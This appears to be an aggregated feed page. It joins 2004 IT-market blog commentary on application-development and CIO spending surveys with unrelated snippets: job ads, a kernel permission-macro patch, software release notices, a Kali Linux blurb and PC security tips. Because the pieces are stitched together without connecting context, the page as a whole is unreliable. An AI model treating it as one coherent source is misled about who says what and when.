The lead article and cover story is titled, "The App-Dev Revolution."  "Of the solution providers we surveyed, 72 percent say they currently develop custom applications or tailor packaged software for their customers. Nearly half (45 percent) of their 2003 revenues came from these app-dev projects, and nearly two-thirds of them expect the app-dev portion of total revenue to increase during the next 12 months."  I view this as good news for China's SIs; from what I've observed, many SIs in China would be a good fit for SIs in the U.S. looking for partners to help lower their development costs.  "By necessity, today's solution providers are becoming nimbler in the software work they do, designing and developing targeted projects like those that solve regulatory compliance demands, such as HIPAA, or crafting wireless applications that let doctors and nurses stay connected while they roam hospital halls."  Have a niche; don't try to be everything to everyone.  "Nine in 10 of survey respondents said their average app-dev projects are completed in less than a year now, with the smallest companies (those with less than $1 million in revenue) finishing up in the quickest time, three months, on average."  Need for speed.  "The need to get the job done faster for quick ROI might explain the growing popularity of Microsoft's .Net framework and tools.  In our survey, 53 percent of VARs said they had developed a .Net application in the past 12 months, and 66 percent of them expect to do so in the coming 12 months."  My Microsoft build-to-their-stack strategy.  "Some of the hottest project areas they report this year include application integration, which 69 percent of VARs with between $10 million or more in revenue pinned as their busiest area.  Other top development projects center around e-commerce applications, CRM, business-intelligence solutions, enterprisewide portals and ERP, ..."  How many times have I said this?    
"At the same time, VARs in significant numbers are tapping open-source tools and exploiting Web services and XML to help cut down on expensive software-integration work; in effect, acknowledging that application development needs to be more cost-conscious and, thus, take advantage of open standards and reusable components.  Our survey found that 32 percent of VARs had developed applications on Linux in the past six months, while 46 percent of them said they plan to do so in the next six months.  The other open-source technologies they are using today run the gamut from databases and development tools to application servers."  I guess there's really an open source strategy.  I come down hard on open source for one simple reason:  I believe that SIs in China could get more sub-contracting business from a build-to-a-stack strategy.  And building to the open source stack isn't building to a stack at all!!  "As a business, it has many points of entry and areas of specialization.  Our survey participants first arrived in the world of app dev in a variety of ways, from bidding on app-dev projects (45 percent) to partnering with more experienced developers and VARs (28 percent) to hiring more development personnel (31 percent)."  For SIs in China, simply responding to end-user RFQs is kind of silly.  Better to partner on a sub-contracting basis.  "According to our State of Application Development survey, health care (36 percent), retail (31 percent) and manufacturing (30 percent) ranked as the most popular vertical industries for which respondents are building custom applications.  Broken down further, among VARs with less than $1 million in total sales, retail scored highest, while health care topped the list of midrange to large solution providers."  Because of regulatory issues, I'm not so keen on health care.  I'd go with manufacturing followed by retail.  My $ .02.  
"When it comes to partnering with the major platform vendors, Microsoft comes out the hands-on winner among ISVs and other development shops.  A whopping 76 percent of developers in our survey favored the Microsoft camp.  Their level of devotion was evenly divided among small, midsize and large VARs who partner with Microsoft to develop and deliver their application solutions.  By contrast, the next closest vendor is IBM, with whom one in four VARs said they partner.  Perhaps unsurprisingly, the IBM percentages were higher among the large VAR category (those with sales of $10 million or more), with 42 percent of their partners coming from that corporate demographic.  Only 16 percent of smaller VARs partner with IBM, according to the survey.  The same goes for Oracle: One-quarter of survey respondents reported partnering with the Redwood Shores, Calif.-based company, with 47 percent of them falling in the large VAR category.  On the deployment side, half of the developers surveyed picked Windows Server 2003/.Net as the primary platform to deliver their applications, while IBM's WebSphere application server was the choice for 7 percent of respondents.  BEA's WebLogic grabbed 4 percent, and Oracle's 9i application server 3 percent of those VARs who said they use these app servers as their primary deployment vehicle."  Microsoft, Microsoft, Microsoft.  Need I say more?  See http://tinyurl.com/45z94 .
The next article is on open source.  "Want a world-class database with all the bells and whistles for a fraction of what IBM or Oracle want?  There's MySQL.  How about a compelling alternative to WebSphere or WebLogic?  Think JBoss.  These are, obviously, the best-known examples of the second generation of open-source software companies following in the footsteps of Apache, Linux and other software initiatives, but there are far more alternatives than these.  Consider Zope, a content-management system downloaded tens of thousands of times per month free of charge, according to Zope CEO Rob Page.  Some believe Zope and applications built with Zope are better than the commercial alternative they threaten to put out of business, Documentum.  Zope is also often used to help build additional open-source applications.  One such example is Plone, an open-source information-management system.  What began as a fledgling movement at the end of the past decade and later became known as building around the "LAMP stack" (LAMP is an acronym that stands for Linux, Apache, MySQL and PHP or Perl) has exploded to virtually all categories of software.  That includes security, where SpamAssassin is battling spam and Symantec, too.  Popular?  Well, it has now become an Apache Software Foundation official project.  The use of open source is so widespread that the percentage of solution providers who say they partner with MySQL nearly equals the percentage who say they partner with Oracle: 23 percent to 25 percent, respectively."  There are plenty of choices for those SIs willing to play the open source game.  See http://tinyurl.com/4e3c7 .
"It's all about integration" follows.  "There are many reasons for the surge in application-development projects (the recent slowdown in software spending notwithstanding).  For one, many projects that were put on hold when the downturn hit a few years ago are now back in play.  That includes enterprise-portal projects, supply-chain automation efforts, various e-commerce endeavors and the integration of disparate business systems."  Choose carefully, however.  Balance this data with other data.  Right now, I see a lot more play with portals and EAI.  "Indeed, the need for quality and timely information is a key driver of investments in application-integration initiatives and the implementation of database and business-intelligence software and portals.  A healthy majority of solution providers say application integration is a key component of the IT solutions they are deploying for customers.  According to our application-development survey, 60 percent say their projects involved integrating disparate applications and systems during the past 12 months."  "Some customers are moving beyond enterprise-application integration to more standards-based services-oriented architectures (SOAs).  SOAs are a key building block that CIOs are looking to build across their enterprises."  Anyone who regularly reads any one of my three IT-related blogs knows that I'm gung-ho on SOAs.  "Even if your customers are not looking for an SOA, integrating different systems is clearly the order of the day.  To wit, even those partners that say enterprise portals or e-business applications account for the bulk of their business note that the integration component is key."  Yes, integration, integration, integration.  I'll be saying this next year, too.  And the year after ...  "Another way to stay on top of the competition is to participate in beta programs."  Absolutely true -- and a good strategy, too.  See http://tinyurl.com/6x2gg .
The next article is on utility computing versus packaged software.  Again, if you read what I write, you know that I'm also gung-ho on utility computing.  "According to VARBusiness' survey of application developers, more than 66 percent of the applications created currently reside with the customer, while 22 percent of applications deployed are hosted by the VAR.  And a little more than 12 percent of applications developed are being hosted by a third party.  Where services have made their biggest inroads as an alternative to software is in applications that help companies manage their customer and sales information."  The article goes on to state that apps that are not mission-critical have the best chance in the utility computing space.  Time will tell.  Take note, however, that these are often the apps that will most likely be outsourced to partners in China.  "Simply creating services from scratch and then shopping them around isn't the only way to break into this area.  NewView Consulting is expanding its services business by starting with the client and working backward.  The Porter, Ind.-based security consultant takes whatever technology clients have and develops services for them based on need."  And focus on services businesses and .NET, too.  "Most application developers agree that services revenue will continue to climb for the next year or two before they plateau, resulting in a 50-50 or 60-40 services-to-software mix for the typical developer.  The reason for this is that while applications such as CRM are ideally suited to services-based delivery, there are still plenty of other applications that companies would prefer to keep in-house and that are often dependent on the whims of a particular company."  Still, such a split shows a phenomenal rise in the importance of utility computing offerings.  See http://tinyurl.com/54blv .
Next up:  Microsoft wants you!!  (Replace the image of Uncle Sam with the image of Bill Gates!!)  Actually, the article isn't specifically about Microsoft.  "Microsoft is rounding up as many partners as it can and is bolstering them with support to increase software sales.  The attitude is: Here's our platform; go write and prosper.  IBM's strategy, meanwhile, is strikingly different.  While it, too, has created relationships with tens of thousands of ISVs over recent years,  IBM prefers to handpick a relatively select group, numbering approximately 1,000, and develop a hand-holding sales and marketing approach with them in a follow-through, go-to-market strategy."  Both are viable strategies, but NOT both at the same time!!  "To be sure, the results of VARBusiness' 2004 State of Application Development survey indicates that Microsoft's strategy makes it the No. 1 go-to platform vendor among the 472 application developers participating in the survey.  In fact, more than seven out of 10 (76 percent) said they were partnering with Microsoft to deliver custom applications for their clients.  That number is nearly three times the percentage of application developers (26 percent) who said they were working with IBM ..."  Percentages as follows:  Microsoft, 76%; IBM, 26%; Oracle, 25%; MySQL, 23%; Red Hat, 17%; Sun, 16%; Novell, 11%; BEA, 9%.  I said BOTH, NOT ALL.  Think Microsoft and IBM.  However, a Java strategy could be BOTH a Sun AND IBM strategy (and even a BEA strategy).  See http://tinyurl.com/68grf .
There was another article I liked called, "How to Team With A Vendor," although it's not part of the app-dev special section per se.  This posting is too long, so I'll either save it for later or now note that it has been urled.  See http://www.furl.net/item.jsp?id=680282 .  Also a kind of funny article on turning an Xbox into a Linux PC.  See http://tinyurl.com/4mhn6 .  See also http://www.xbox-linux.org .
Quick note:  I'll be in SH and HZ most of next week, so I may not publish again until the week of the 23rd.

          [urls] Build a Better Enterprise Application        
Thursday, August 12, 2004
Dateline: China
The following is a sampling of my top ten "urls" for the past week or so.  (Furl subscription details are in the previous [urls] posting.)
Top Honors:
* Build a Better Enterprise Application (on Web services and SOA; great review of all the pertinent issues)
Other best new selections (in no particular order):
* Adaptive Document Layout via Manifold Content (PDF) (another hit for Microsoft, this article proposes a user interface for authoring and editing Web content for different form factors; think formatting for ubiquitous devices and pervasive computing)
A New View on Intelligence (on XML & EII, et al) (thoroughly enjoyable -- so good,  I almost blogged it; insightful perspective)
InfoWorld Special Report: Has desktop Linux come of age? (IMHO, a resounding "No!!"  But there are other perspectives worth considering.  I still think it's a lot of wishful thinking.)
* Negotiating in Service-Oriented Environments (PDF) (A slightly annotated excerpt: "The concept of delivering software as a service is relatively simply: 'do not buy software, simply use it as and when you need it'.  Putting such a concept into practice, however, is far more complex and involves many issues.  In this article, we address the question: What are the characteristics of a market for software services?"  Hot topic, good paper.)
* Real Time Means Real Change (so much talk about the so-called "Real Time Enterprise"; this article takes a look at the realities behind the hype of the "RTE")
Information Scent on the Web (PDF) (Courtesy of PARC, you need to read this for yourself; Google as The Matrix idea -- worse yet, The Time Machine Reloaded   In reality, useful perspectives for Web designers.)
Offshoring/Outsourcing: Fragile - Handle With Care (a brief but rather comprehensive overview; points to the various aspects of ITO and BPO along the IT value chain)
IT Spending For Comprehensive Compliance (original article linked; good review of the various opportunities "thanks" mostly to SOX)
* The Executive's Guide to Utility Computing - ROI of Utility Computing (a broad perspective on utility computing, different from what is usually published)
Examples of urls that didn't make my "Top Ten List":
> Benchmarking Study Shows 75 Percent of Enterprises Deploying Web Services (need I say more?; includes stats on ebXML and grid computing, too)
> Probabilistic Model for Contextual Retrieval (PDF) (a sneak peek at Microsoft's emerging search technology?)  See also Block-based Web Search, courtesy of Microsoft Research Asia (Beijing) and Tsinghua University, arguably China's best (the latter article is not urled; from the recent SIGIR conference).  If you think Google is the last word in search, think again.
> Where To Find New Growth Prospects And What Challenges Need To Be Overcome (necessary action items and preferred geographic regions; China <not Russia, Brazil or the Czech Republic> comes in the number two slot after North America)
> CIO Magazine: Are We Happy Yet? (on ITO and BPO) (dumb article title, but smart content; good metrics to consider, including a take on SLAs)
> Developing Killer Apps for Industrial Augmented Reality (restricted access) (this page provides some complimentary information to the restricted access selection, although it's not urled).  I just noticed something:  The apps section of IEEE CG&A is edited by two mil guys, one from the (U.S.) Office of Naval Research and the other from the U.S. Army simulation and training office.  Hey, who says all the good engineering jobs are outsourced!?    Frankly, I believe that the best American engineers can always find jobs within DoD or the intelligence community.  Besides, they do all the truly fun computing stuff!!  Trust me, there isn't so much fun stuff done at Oracle.
and many, many more ...

          [news] IT Spending Trends        
Tuesday, July 6, 2004
Dateline: China
A quick recap on IT spending trends from three recently published Smith Barney surveys.  The three reports are the May and June editions of their CIO Vendor Preference Survey and the 6 June issue of softwareWEEK.  Tom Berquist, my favorite i-banking analyst, was the lead for all three reports.  I have a backlog of blogs to write, so I'll use as many quotes as possible and add context where necessary.  (I'm mostly extracting from my smartphone bookmarks for these reports.  Warning:  I may have coded the May and June issues incorrectly, but the quotes are correct.)  NOTE:  Highlighted items (e.g., items in bold, like this sentence) are MY emphasis.  Items in red are my commentary.
Starting with the Survey editions, "(t)he strongest areas of spending appear to be software (apps, security, storage, and database) and network equipment/apps (Gigabit Ethernet, WLAN, VPNs)" and regarding software, "larger and more well known vendors continue to dominate the list in each category with vendors such as Microsoft, SAP, IBM, Veritas, Symantec and Computer Associates getting significantly more mentions in each of their groups than the remaining vendors did."  However, the report admits that their sample group might be biased.  Yes, vendors matter -- and so do vendor partnering strategies.  However, I'm a bit skeptical about CA and I don't particularly care for Veritas or Symantec.  Not my part of the universe.
"Applications again stand out as a clear area of strength."  "Within applications, Enterprise Resource Planning (ERP), Supply Chain Management (SCM), Customer Relationship Management (CRM) and Business Intelligence (BI) all showed extremely well ..."  Well, this is the first sign that a recovery may be in the making for SCM.  However, I'd emphasize BI and ERP, followed by CRM; don't count on a lot happening in the SCM space just yet.  Some other key surveys do NOT validate that SCM is in recovery.  "In terms of specific vendors, Microsoft, Symantec, Veritas, SAP, and Adobe were the top beneficiaries of CIOs intentions to increase spending."  The report continues that only SAP showed statistically significant results, both in ERP and SCM.  "Results were more mixed for best-of-breed vendors in this area, suggesting that horizontal applications vendors are having a tough time competing with the large ERP vendors even as vertically-focused vendors continue to have some measure of success on this front."  For the more adventurous SIs in China, SAP presents a lot of opportunities.  Tread carefully, though.  And "Adobe's enterprise strategy appears to be gaining momentum.  Adobe was a clear standout in content management ..."  "Survey results were also positive (though somewhat less so) for other leading content management players, notably Microsoft and IBM."  Another "win" for Microsoft.  Funny that none of the traditionally leading content management players were mentioned.  A take on Linux:  "Linux continues to garner mind share, but large enterprises remain the main adopter.  Interestingly, nearly 83% of our respondents stated that they were not currently moving any applications to Linux.  Of the 17% that said they were moving applications to Linux, only one company under $1.0 billion in revenue was making the transition to Linux confirming our views that Linux is primarily being used by large companies to shift Unix applications to Linux on Intel."
"Among CIOs who indicated a higher level of consulting spend, IBM was the clear winner, followed by Accenture as a distant second.  Unisys was also mentioned as a vendor being considered, but it was a distant third.  However, we note that Unisys being mentioned ahead of a pure-play consultant like BearingPoint (a low number of mentions, which included mentions of decreased spending) or EDS is positive, given that Unisys chooses to focus in 2 specific verticals, including one-public sector-that was not in the survey."  "Over two-thirds of CIOs indicated that they do not use IT outsourcers.  Most of the rest said they were unlikely to change the level of outsourcing spend.  IBM, ACS and CSC were the only vendors explicitly mentioned as likely to get more outsourcing business."  The "two-thirds" figure will likely change in favor of outsourcing.  This trend is fairly clear.  See a BCG report at http://tinyurl.com/2muy8 , although the report takes a relatively broad perspective.
From softwareWEEK, "(t)he CIOs were also very focused on rapid 'time to market' with purchases.  None were interested in starting projects that would take greater than 2 quarters to complete."  "This requirement was not a 'payback' requirement, but rather an implementation time frame requirement.  The CIOs did recognize that payback times could be longer, though the payback times on IT utility spending were much shorter than on applications or emerging area spending."
"In terms of spending, the CIOs all used a similar methodology for making decisions that essentially divides their IT spending into one of three categories: 1) sustained spending on their 'IT utility' (i.e., infrastructure such as network equipment, servers, storage, databases, etc.); 2) new project spending on applications (business intelligence, portals, CRM, etc.); and 3) investment spending on select emerging areas (grid/utility computing, identity management, collaboration, etc.)  It was pretty obvious that the CIOs recognized that business unit managers were more interested in spending on new applications/emerging areas than on the IT utility ..."  "(S)ome of the CIOs were experimenting with grid/utility computing initiatives to try to increase their utilization of storage/servers and reduce the amount of new equipment to be purchased.  In one example, a CIO showed their storage/server utilization around the world and many regions were in the 50% or worse bucket for average utilization.  Their goal was to use grid computing architectures and storage area networks (along with faster communication links) to better share the pool of resources."  Yes, this is it!!  Take this to heart!!  If you think grid and utility computing are Star Trek stuff, think again.
"In terms of new projects, the CIOs mentioned they were spending on business intelligence, portal/self-service applications, CRM, and collaboration.  Collaboration was a heated discussion, with all CIOs commenting that this was a big problem for them and there was no clear solution on the market.  While it wasn't completely clear to the audience what the CIOs were looking for in a collaboration solution, the elements that were described included: more intelligent email, corporate instant messaging, web conferencing, integrated voice over IP with instant messaging (so that a conversation could quickly shift from typing to talking), and collaborative document editing (spreadsheets, presentations, publications, etc.).  Within the business intelligence arena, business activity monitoring was discussed as was building of enterprise data warehouses/data marts.  The portal/self-service applications being built or deployed were primarily for customer and employee self-service (remote access to email, applications, and files was a big deal for all of the companies).  On the CRM front, the discussion from one CIO was around their need to increase revenues and manage channel conflict better."  [I'll be posting to this blog a bit more about collaboration opportunities over the next week.]
"While vendors were not discussed in any detail during the panel, the CIOs did say that they remain open to working with smaller vendors (public and private) as long as they have plenty of relevant references (in their industry, particularly with close competitors) and they offer a compelling value proposition versus larger vendors.  One CIO stated that they get called by 20 startups a week to sell products to them, but most of them cannot articulate the value proposition of their product.  Nonetheless, the CIO does take 5 meetings a month from startups because some of them are working on things that are interesting to the business."
Whew ...  Lots of good material.  To reiterate, all highlighted items are my emphasis.  Bottom line:  The market is heating up.  Get your ISV relationships in place.  Pick your verticals (see the "Tidbit on Microsoft" which follows).  Pick your apps -- and the apps I like the best are content management and BI, although ERP is looking good, too.  Collaboration can be a major source of revenue if the SI can provide a truly effective solution.
Tidbits on Microsoft
A quick update on some happenings in the Redmond universe.  (See http://tinyurl.com/36xgu ; the article is titled, "Microsoft focuses on its enterprise-applications business".)  First, app areas that are of particular interest to MS include those for manufacturing and life sciences.  So, how about a MS build-to-their-stack strategy focused on either of these two verticals?  Second, MS is moving beyond purely horizontal offerings to very specific functionality.  Their Encore acquisition is an example of MS moving in this direction.  Finally, new releases of all four of Microsoft's ERP product lines are due for this year.  Not surprisingly, MBS marketing is up 20% from FY04.  Hmmm ... ERP spending intentions are strong and MS is a key player in this space -- with several updated offerings scheduled for release this year.  Another opportunity?
Tidbits on Infosys
Infosys formally enters the IT strategy consulting biz.  (See http://tinyurl.com/2xxlo .)  Yes, it was inevitable.  In April Infosys Consulting, Inc. was formed and, "(i)t's no secret that the winning model will be high-end business consulting combined with high-quality, low-cost technology delivery done offshore," according to Stephen Pratt, the head of Infosys' consulting unit.  The Infosys Consulting unit now has 150 employees in the States and plans to expand to 500 within three years.  Note to SIs in China:  You need more -- a lot more -- IT strategy types.  And you need people in the States (at least on an "as needed" basis) in order to capture -- and serve -- new accounts.
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
To automatically subscribe click on http://tinyurl.com/388yf .

          Paradigm Shift with Edge Intelligence        
In my Internet of Things keynote at LinuxCon 2014 in Chicago last week, I touched upon a new trend: the rise of a new kind of utility or service model, the so-called IoT specific service provider model, or IoT SP for short. I had a recent conversation with a team of physicists at the Large Hadron […]
          In Search of The First Transaction        
At the height of an eventful week – Cloud and IoT developments, Open Source Think Tank,  Linux Foundation Summit – I learned about the fate of my fellow alumnus, an upperclassman as it were, the brilliant open source developer and crypto genius known for the first transaction on Bitcoin. Hal Finney is a Caltech graduate who went […]
          Top 15 Nokia N9 Apps        
Nokia N9 is one of the most beautiful devices Nokia has ever made. The shape, its body – every aspect of the phone speaks to how much Nokia has put into it. The new (not so new now) Nokia N9 is an elegant device that runs on MeeGo, a Linux-based operating system, which Nokia […]
          Disable Addon Compatibility Check in Firefox 7.0a1 Nightly Build        
Firefox 7.0 Alpha 1 (nightly build) is now available for download for Windows, Mac and Linux. You can download the latest build as the Mozilla team works on it and updates it daily. Firefox 5.0 was also just released yesterday for download. Those of you trying to use Firefox 7.0a1 will be […]
          Experienced Unix / Linux Engineer (M/F) - Aduneo - Malakoff        
Unix Linux messaging engineer. We are hiring, on a permanent contract, a UNIX/LINUX systems engineer to work with our major-account clients. You will report to our technical department, delivering fixed-price projects from our offices in Malakoff (near metro line 13) or at our clients' sites in Île-de-France. You will take part in projects to implement, administer, and secure Unix architectures. Desired technical skills: ...
          Linux / Windows Systems Administrator - Banking Sector (M/F) - Alten - Boulogne-Billancourt        
Project description: To strengthen our teams, we are looking for Linux systems administrators of all experience levels to work on production service platforms, on large-scale physical and virtualized servers. You will: master the technical solution; resolve complex malfunctions (L2-L3 support); integrate, test, and deploy the necessary changes and propose avenues of improvement to enhance the...
          Windows / Linux Systems Engineer (M/F) - Umantic - Saint Denis        
Windows/Linux SYSTEMS ENGINEER. On behalf of one of our clients, an operator in the railway sector, you will set up and maintain the relevant software and its associated operating systems. The team you join integrates the software solutions into the production environment and handles their deployment. Main duties: you carry out, or assist the client with, the implementation of the software and the...
          Linux Systems Administrator (M/F) - Clémentine International - Paris        
Systems Administrator (M/F). Our client is the leading European group of online travel agencies and the fifth largest worldwide. The group is also the largest European e-commerce company. Its various brands offer the best deals on scheduled, charter, and low-cost flights. They also offer other services and products, such as hotels, car rental, and package trips or trips you assemble yourself...
          UNIX / Linux Systems Administrator (M/F) - ACENSI - Lille        
As part of the growth of our Lille office, and to meet the needs of one of our clients, we are looking for a systems and network administrator. Your duties: administration and operation of open source systems (Red Hat); deployment of new Linux and Windows platforms and keeping them in operational condition; tracking and resolving level 2/3 incidents across all server issues. ...
          DevOps Engineer, Continuous Integration JENKINS/ANSIBLE (M/F) - DAVIDSON CONSULTING - Boulogne-Billancourt        
Within the industrialization and architecture team, your duties will be: maintaining and setting up Ansible playbooks ("automate the deliveries"); installing and maintaining the continuous integration and continuous deployment tools; installing and configuring EC2/AMI (AWS); installing and configuring containers (Docker); Linux system administration; shell script development; management of the...
          DevOps Engineer (M/F) - Oxiane - Paris and inner suburbs        
We are looking for a DevOps and Continuous Integration Engineer. Join our Factory team. Profile, skills, experience: a master's-level (Bac +4/5) degree in computer science; several years of development experience with a solid Java / Java EE background; and of course "Ops" knowledge: administration of an IT estate (Linux, Windows), OS scripting languages (*sh, PowerShell), networking knowledge, DevOps tooling (infrastructure...
          Experienced Linux Systems Engineer - Telecom Sector (M/F) - Alten - Paris        
Project description: We are hiring, on a permanent contract, a Linux Systems Administrator to work on production service platforms, on large-scale physical and virtualized servers. Your responsibilities will be to: master the technical solution; resolve complex malfunctions; integrate, test, and deploy the necessary changes and propose avenues of improvement to enhance how the solution works...
          Linux Systems Administrator / Engineer - OpenStack (M/F) - Alten - Toulouse        
As part of a global digital transformation, we are looking for an OpenStack Engineer or Linux Administrator. Your main duties will be to: align the rollout of an IaaS platform with the security policy; propose architecture scenarios with in-depth analysis (pros/cons, budget); define the components of the architecture (servers, storage...); investigate problems on servers. A graduate of a...
          LINUX SYSTEMS ADMINISTRATOR (M/F) - Industrial Sector - Alten - TOULOUSE        
Project description: Embedded within the project teams, your duties will be to: master the technical solution; resolve complex malfunctions; integrate, test, and deploy the necessary changes and propose avenues of improvement to enhance how the solution works; contribute to improving working methods; contribute to the rollout of new technical solutions. Desired profile: a graduate of an engineering school or...
          Integration and Validation Engineer (M/F) - ALTIM Consulting - Boulogne-Billancourt        
Who are you? You have an engineering degree in computer science and three years' experience in an integration role (or significant internships), with skills in embedded application development (Linux, Makefile, Buildroot / Yocto, C/C++, Bash, Perl, Python). You are autonomous and rigorous, you can work in a team, and you are good at synthesis. What can we accomplish together? ...
          Embedded Linux Engineer (M/F) - ALTIM Consulting - Boulogne-Billancourt        
Who are we? ALTIM, a fast-growing consultancy specializing in embedded software development for the digital TV, automotive, and healthcare sectors, is looking for Embedded Linux Engineers (M/F). Who are you? With a master's-level (Bac +5) degree from a university or engineering school, you have one or more significant experiences on projects involving embedded software (C/C++), Linux drivers, the Android kernel, embedded Java, and/or Yocto. What we can...
          Comment on "Outdated Windows present on more than 8 million Brazilian PCs" by Wesley Francis        
The trick is to dual-boot Windows and some stable Linux distro and have the best of both worlds.
          [PATCH 0966/1285] Replace numeric parameter like 0444 with macro (no replies)        
I find that developers often just specify a numeric value
when calling a macro that is defined with an access-permission parameter.
As we know, these numeric permission values already have corresponding macros,
and using the macros improves the robustness and readability of the code,
so I suggest replacing the numeric parameters with the macros.

Signed-off-by: Chuansheng Liu <chuansheng.liu@intel.com>
Signed-off-by: Baole Ni <baolex.ni@intel.com>
drivers/tty/n_gsm.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
index 54cab59..4f25fd9 100644
--- a/drivers/tty/n_gsm.c
+++ b/drivers/tty/n_gsm.c
@@ -64,7 +64,7 @@
#include <linux/gsmmux.h>

static int debug;
-module_param(debug, int, 0600);
+module_param(debug, int, S_IRUSR | S_IWUSR);

/* Defaults: these are from the specification */

          Netpeak Spider — an advanced tool for SEO site analysis        

Hello, dear readers of the Goldbusinessnet.com blog. Today I would like to offer you a review of one of the tools from the Netpeak Software service, Netpeak Spider, which can prove useful for analyzing a site and uncovering the errors that stand in the way of its successful promotion. Admittedly, so far this software is only available for Windows, but as far as I know, development for Linux and Mac OS is in full swing.

There are quite a few analytical resources of this kind on the web that let you check pages online for compliance with the required SEO standards. Using the Netpeak Spider application, however, lets you carry out the analysis scrupulously and obtain higher-quality results.

I should say right away that getting Spider is a paid pleasure, so novice webmasters may find it hard to part with their hard-earned money to activate and renew a license. For owners of commercial sites and SEO specialists, however, this software can do a real service and, in time, more than repay the investment. And now it is time to learn a bit more about our hero.


          BibleDesktop 1.0.7        

BibleDesktop, the portable JSword-based Bible study tool, for Windows, Macintosh and Linux, now supports Parallel Bibles. And as an added bonus, you can visually compare 2 or more Bibles of the same language. See the JSword Change Log for more details and other improvements.

You can download it from here.
          BibleDesktop 1.0.6        

Happy Easter!

BibleDesktop, the portable JSword-based Bible study tool, for Windows, Macintosh and Linux, has been improved!!! This release completes our support for all Sword modules, except Personal Commentary. See the JSword Change Log for more details.

You can download it from here.
          Work at Home West Coast Region Associate Technical Support Engineer        
Security software company is filling a position for a Work at Home West Coast Region Associate Technical Support Engineer. Core responsibilities include: tracking and monitoring assigned support cases to ensure timely resolution and follow-up; fielding queries via phone, email and the web portal of the CRM solution; representing the customer to ensure serviceability and product quality issues are being tracked, prioritized, resolved, and incorporated into the product release cycle. Skills and requirements include: 1+ years' relevant experience supporting a distributed software technology in a Windows, Mac, and Linux environment, ideally an agent-based product; demonstrated prior success exceeding customer expectations in a technical support capacity; excellent customer service skills.
          Kali Linux | Rebirth of BackTrack, the Penetration Testing Distribution.        
Kali Linux | Rebirth of BackTrack, the Penetration Testing Distribution: The most advanced penetration testing distribution, ever. From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system.

          4 intelligent thoughts from a deep geek        

(1) If you don't want to pay for an anti-virus program, at least install a free one.
Your PC probably came with a trial version of an anti-virus program that will stop working after a month unless you upgrade to the paid version. Of course you can do that if you want, especially if you think you might ever want phone tech support for your anti-virus software; I expect support is better for a product you've paid money for.
On the other hand, I know people who thought that if they didn't want to pay for the upgrade to their PC's default anti-virus program, their only option was to let it expire and let their computer run unprotected. If you don't want to pay for a non-free program, install a free one -- Wikipedia has a list of 15 different free or freemium anti-virus products for Windows. PC Magazine gave their "Editor's Choice" award for best free Windows anti-virus to Malwarebytes Anti-Malware 1.70 in 2013 and AVG Anti-Virus Free in 2012, so either of those will work.
(Yes, I know you guys know this. But pass the word on to your Mom or kid brother with the new laptop.)
(2) Save files to a folder that is automatically mirrored to the cloud, for effortless backups.
The era in which everybody talks about backing up but nobody actually does it should have ended completely in 2013. Old-style backups, even the incredibly easy options, still mostly required you to stop what you were doing for a minute, connect to a remote server or connect a piece of hardware to your computer, and twiddle your thumbs while waiting for some copy process to execute. So nobody bothered.
With cloud-mirrored folders, there's no excuse any more. I found out about Dropbox by asking a mailing list, "I would really like it if there were an online backup service that let me open and close files from a local folder so that there was no delay, but as soon as I made any changes, would automatically be queued to be backed up over the network to a remote host," and my listmates said, "That already exists." Windows 8 comes with the similar SkyDrive service already built in.
You can read a detailed comparison of Dropbox vs. SkyDrive vs. Google Drive, but the key point is to use one of them to mirror one of your local folders to the cloud, and get into the habit of saving stuff to that folder. Obviously this may not apply to you if you have something special going on (if you're creating large multimedia files that won't fit within the several-gigabyte limit imposed by these services, or if your privacy concerns are great enough that you don't want to back up files online), but it's good enough for most people. The horror stories about people saving months or years of writing, and then losing it all in a hard drive crash, should never happen to anyone again.
(3) Create a non-administrator guest account, in case a friend needs to borrow the computer.
Some of my friends and relatives have no problem telling people, "No, I don't care if you need to check the weather, you can't touch my computer!" But if you can't resist the urge to be helpful if someone needs to borrow your laptop for a few minutes, then eventually one of those people will mess it up somehow -- either by installing a game, or visiting a website that installed malware on your computer, or just changing a system setting that you can't figure out how to change back.
When the day comes when someone needs to borrow your computer, you may be too rushed or might not know how to create an unprivileged non-administrator account that they can log in under. So go ahead and do it when your computer is brand new, while the thought is still fresh in your mind. Then if people who borrow your computer sign in under that account, in almost all cases, nothing that they do while logged in should interfere with your user experience when you log them off and log back in as yourself.
That's not a completely secure solution to stop someone from accessing private files on your computer. (There are many pages describing how to boot up a Windows machine from a Linux CD, in order to access files on the computer -- they are usually described as "disaster recovery" options, but they can also be used to access files on a PC without the password.) However, it will stop most casual users from messing up your computer while they borrow it.
(4) Be aware of your computer's System Restore option as a way of fixing mysterious problems that arose recently.
I say "be aware" because, unlike the other three tips, this may not ever be something that you have to actually do. However, intermediate-level computer users just need to understand what it means: to restore your computer's settings and installed programs to a recently saved snapshot, while leaving your saved files untouched. This means if your computer has started acting funny in the last couple of days, you may be able to fix the problem by restoring to a snapshot that was saved before the problems started.
Intermediate users sometimes confuse this with either (a) restoring files from backup, or (b) doing a system recovery (which generally refers to restoring your computer to the state in which it left the factory). So if you're the techie doing the explaining, make sure they understand the difference. (A system recovery will often fix problems, too, but then of course you'll have to re-install all your software; a system restore is more convenient since it only undoes the most recent system changes.)



GenScriber is a transcription editor for census records, church records, birth, marriage, baptisms, burials, index records etc.
Please note: GenScriber does NOT convert images into text. It is NOT OCR software.

GenScriber is designed to be intuitive and easy to use. The interface is composed of several resizable windows within a single main window. A register image can be viewed in the top window while data is input in the bottom window.

The data input area uses a spreadsheet style grid, but GenScriber is not a spreadsheet.

GenScriber is a stable, non-volatile data input application, designed for a specific purpose.
The problems associated with using spreadsheets for genealogical data input do not apply here. All cell inputs are alphanumeric. No assumptions are made about the data type. Dates and values are not automatically modified to some alien value you didn't want. Unless you specify a special action on a column, all data input remains exactly as you entered it.

GenScriber is free for private and non-commercial use.

It requires no installation. Versions for Linux and Windows are currently available.
          Linux Auto Mouse Click        

Linux Mouse and Keyboard Automation Software Tools

